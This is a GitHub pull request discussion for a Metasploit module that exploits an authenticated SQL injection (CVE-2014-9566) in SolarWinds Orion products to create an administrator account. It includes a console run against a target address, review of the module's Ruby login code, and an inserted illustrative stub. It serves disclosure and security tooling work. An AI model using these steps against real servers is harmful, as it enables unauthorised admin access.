
Solarwinds Core Orion Service SQL injection (CVE-2014-9566) #4836

Merged
merged 5 commits into from
Mar 2, 2015

Conversation

brandonprry
Contributor

This pull request adds support for exploiting an authenticated stacked SQL injection within the core Orion service of many Solarwinds products, specifically:

Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2

Any user can be used to exploit this, including the default Guest account (which has no password by default, and is the default user in the module). IIRC Tod should have a vulnerable trial.

This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of Feb 24th, 2015 was chosen by both parties.

Example run:

bperry@bperry-server:~/tools/brandonprry-metasploit-framework$ ./msfconsole
[*] Starting the Metasploit Framework console...

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1405 exploits - 798 auxiliary - 229 post        ]
+ -- --=[ 361 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use auxiliary/gather/solarwinds_orion_sqli 
msf auxiliary(solarwinds_orion_sqli) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf auxiliary(solarwinds_orion_sqli) > show options

Module options (auxiliary/gather/solarwinds_orion_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.105    yes       The target address
   RPORT      8787             yes       The target port
   TARGETURI  /                yes       Base Orion directory path
   USERNAME   Guest            yes       The username to authenticate as
   VHOST                       no        HTTP server virtual host

msf auxiliary(solarwinds_orion_sqli) > run

[*] Logged in as Guest, sending payload to create SlEDesxq admin user.
[+] The injection worked, log in with SlEDesxq and a blank password
[*] Auxiliary module execution completed
msf auxiliary(solarwinds_orion_sqli) > 

@wchen-r7 wchen-r7 self-assigned this Feb 26, 2015
'__EVENTARGUMENT' => '',
'__VIEWSTATE' => viewstate,
'ctl00$BodyContent$Username' => datastore['USERNAME'],
'ctl00$BodyContent$Password' => datastore['PASSWORD']
Contributor


@brandonprry Can you provide some clarity here? The login function takes the username and password from the datastore and authenticates. By default that is Guest with a blank password. However, when the injection is done, you call login(username, '') which will call the method with the injected username and a blank password; however, the login will still use the previous username (Guest) and password in the datastore, which won't prove anything.

On line 90, I inserted the statement:

datastore['username'] = username

just for demonstration and I got the response:

[screenshot: solarwind_error]

The module fails to log in with the newly created account, but in the current state it will still display success since it is using the datastore username and password.

Contributor


Should be more like

def login(username = datastore['USERNAME'], password = datastore['PASSWORD'])
  # Fetch the login form to obtain the ASP.NET __VIEWSTATE and the session cookie
  res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx')
  })
  fail_with('No response from the Orion login page') if res.nil?

  viewstate = $1 if res.body =~ /id="__VIEWSTATE" value="(.*)" \/>/

  cookie = res.get_cookies

  # Post the supplied credentials (not the datastore ones) with the form state
  res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx'),
    'method' => 'POST',
    'vars_post' => {
      '__EVENTTARGET' => '',
      '__EVENTARGUMENT' => '',
      '__VIEWSTATE' => viewstate,
      'ctl00$BodyContent$Username' => username,
      'ctl00$BodyContent$Password' => password
    },
    'cookie' => cookie
  })
  fail_with('No response to the login request') if res.nil?

  # A successful login redirects; a 200 means the login form was rendered again
  if res.code == 200
    fail_with("Authentication failed with username #{username}")
  end
  cookie + ';' + res.get_cookies
end
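The verification flaw raised in this review, as an added example that is not the module's own code: a stubbed Orion login (standing in for send_request_cgi, knowing only the Guest account) records which username was actually posted, so the argument-ignoring login can be compared with the corrected one that also handles a nil response. The class and method names are assumptions for illustration.

```ruby
# Added example, not Metasploit code. FakeOrion stands in for send_request_cgi:
# it returns 302 (redirect) on a valid login and 200 (form re-rendered) otherwise,
# and nil when the server is "down". Only the Guest account with a blank password exists.
class FakeOrion
  attr_reader :last_user

  def initialize(valid = { 'Guest' => '' }, down: false)
    @valid = valid
    @down = down
  end

  def post(user, pass)
    return nil if @down
    @last_user = user
    @valid[user] == pass ? 302 : 200
  end
end

class OrionClient
  def initialize(http, datastore)
    @http = http
    @datastore = datastore
  end

  # Buggy shape from the review: arguments are accepted but never used, so
  # login_buggy('SlEDesxq', '') really authenticates as the datastore user.
  # Verifying a newly created account this way always "succeeds" (false positive).
  def login_buggy(_username = nil, _password = nil)
    code = @http.post(@datastore['USERNAME'], @datastore['PASSWORD'])
    raise 'Authentication failed' if code == 200
    true
  end

  # Fixed shape: datastore values are only defaults, explicit arguments win,
  # and a nil response (no answer from the server) is reported as a failure.
  def login_fixed(username = @datastore['USERNAME'], password = @datastore['PASSWORD'])
    code = @http.post(username, password)
    raise 'No response from server' if code.nil?
    raise "Authentication failed with username #{username}" if code == 200
    true
  end
end
```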

Contributor Author


Great catch, fixing now. Originally, the login code lived in run, and was moved out. Missed updating this part.

@wchen-r7
Contributor

wchen-r7 commented Mar 1, 2015

I have NPM 11.5 but this doesn't seem to work for me.

[screenshot: screen shot 2015-02-28 at 7 24 13 pm]

Last commit of the branch I tested:

$ git log -1
commit ceb92cdf5e581f48e5b893e7557911bb2799d9a0
Author: Brandon Perry <bperry.volatile@gmail.com>
Date:   Thu Feb 26 07:33:51 2015 -0600

    update login method

@brandonprry
Contributor Author

11.5 is the latest version and is patched. Versions prior to 11.5 are vulnerable.

@wchen-r7 wchen-r7 removed their assignment Mar 1, 2015
@brandonprry
Contributor Author

I currently have vulnerable versions of the following if needed:

SolarWinds-NCM-v7
SolarWinds-NPM-v11
SolarWinds-SAM-v6
SolarWinds-VNQM-v4

@wchen-r7
Contributor

wchen-r7 commented Mar 1, 2015

I'm sure this module works, do you mind just e-mailing a pcap instead? msfdev[at]metasploit.com

The code looks good except I would probably do a res.nil? check for send_request_cgi. I was just gonna fix that myself and land it.

@brandonprry
Contributor Author

I can, will have to be tomorrow though. :) Will also add the nil check.

@wchen-r7
Contributor

wchen-r7 commented Mar 1, 2015

Thank you.

@brandonprry
Contributor Author

Sent.

@void-in
Contributor

void-in commented Mar 2, 2015

Seems like NPM 10.7 is not vulnerable either.

[screenshot: solarwind_error]

@brandonprry
Contributor Author

Hmm, it may be that the SQL schema for the user table isn't the same in 10.7 as in 11.4, which is what I have been testing against for NPM.

If you could get me an installer for 10.7, I wouldn't mind taking a look at the schema to verify.

@wchen-r7
Contributor

wchen-r7 commented Mar 2, 2015

I have received the pcap so I am ready to land this. If you would like this to be landed now, I can do it. If you prefer to wait a little bit longer to double check on 10.7, I can do that too. Please let me know. Thanks.

@brandonprry
Contributor Author

I am OK with merging it in the current state. I tested with the versions prior to the latest available that I posted above, but can make an updated PR if I can get a hold of 10.7.

@void-in
Contributor

void-in commented Mar 2, 2015

@brandonprry I will take a look at it in a day or two (actually out of office for a few days) and send you the required setup file.

@wchen-r7
Contributor

wchen-r7 commented Mar 2, 2015

> I am OK with merging it in the current state. I tested with the versions prior to the latest available that I posted above, but can make an updated PR if I can get a hold of 10.7.

Ok, then I will merge it today. Thanks.

@wchen-r7 wchen-r7 merged commit f8e3874 into rapid7:master Mar 2, 2015
@brandonprry
Contributor Author

Thanks a bunch dude!

@void-in, feel free to hit me up on IRC if you can get the installer.


http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
